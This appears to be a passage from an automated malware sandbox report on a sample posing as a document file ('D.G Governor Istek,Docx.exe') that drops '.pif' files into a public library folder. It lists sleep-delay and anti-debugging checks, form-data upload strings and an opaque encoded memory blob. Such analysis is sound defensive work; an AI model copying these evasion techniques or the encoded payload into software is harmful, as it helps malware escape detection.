          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596586
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596484
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596374
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596265
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596156
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596046
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595937
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595827
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595718
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595609
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595500
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595390
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595281
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595171
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595062
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594953
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594843
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594734
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594625
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594515
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594406
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594296
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594187
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd241d958a93e9<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20ed9b305c5d<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd232b76f6085e<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd22efb27445d5<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1fc2f018f4d8<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd210a7f89af93<
          Source: xzeheenC.pif, 0000000D.00000002.3467243352.000000002ED66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR-
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21b3074f62f3<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2480fc2e3ffd<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd218ddbcb8c7b<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd229ac9c02cfe<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.00000000345C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f4d2fc2fa98
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2125107c93fb<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20ef893a5471<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f7b1dfba8e0
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd227b407d5dfd<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1facead84021
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd22ac30a66dbf<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd236fb4dcf471<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f4d24e5b12f
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd214541f09a2e<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21d05113ef78<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2347cf9f5e67<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd212895f468d0<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f4d2162bfeb
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd211ac1c4f774<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd23b767e4612b<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd206c71d33bae<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2032ce18b5a9<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2161f5499881<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd22de6d3ef3c7<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd28b07a2e3bf6<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd221a131b77fa<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2056fe5a93ed<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd22c3003a5e58<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd225faa7b54ce<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21322c4586e7<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2541c39c92aa<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2941500303d9<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2470cc4c7c4c<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd23ee6cc60601<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd24f1d8f190ea<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd25d7579be125<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2410d566cb44<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2253ee1debeb<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20e90cf9d34f<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2049c4599bf0<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2056f7803414<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20af00185e1e<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21acbc242eed<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f7c87e875f8
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd23a7e0c358b1<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20d938fe0172<
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd208e2eaa00de<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd25151bda7f10<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd26047d4600f9<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21699b4eabd7<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd203ec07e1085
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2570877d30d9<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f9415ada89a<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd26086a764c20<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2081d1ada311<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21d585647a82<
          Source: xzeheenC.pif, 00000004.00000002.3466173461.000000001B216000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ?e
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2813e0605d29<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd23627ca5d7a5<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21f715d5f928<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21a9f558bff4<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd222e6a7585d6<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2140552249de<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21cf699ce188<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2228c5d66ead<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd271102821989<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd205f4e93af8a<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd216ef987af00<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f4d324b9521
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f4d1c06ddc3
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20d7324cb693<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2101f28456d5<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd214ffb664a86<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2000757d4a82
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd224dea6ac3fc<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd24f09b604f03<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20a77e51f755<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2098731e7d87<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2461846d9172<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f6bdc044996
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D38B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1f4d27f0447e
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd228686aed571<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2189f0cb04ca<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20be100b0715<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20761e459bea<
          Source: Cneehezx.PIF, 00000006.00000002.2343999194.0000000000740000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3468775169.000000003260D000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000002.2424965062.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd20c4261497b1<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1fab8db33d56
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.000000000076E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2391582c4776<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd268de6126dd3<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2587cc98b653<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21fe3ea779ee<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd210716015f06<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd218608facd63<
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd22ff41348b47<
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2280840787.000000007FBC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 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
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2321d33b2b75<
          Source: xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd21f3fd82474b<
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2799595f15e7<
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeAPI call chain: ExitProcess graph end nodegraph_0-25165
          Source: C:\Users\Public\Libraries\xzeheenC.pifAPI call chain: ExitProcess graph end nodegraph_4-52500
          Source: C:\Users\Public\Libraries\xzeheenC.pifAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\Cneehezx.PIFAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DEBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_029DEBF0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess queried: DebugPort
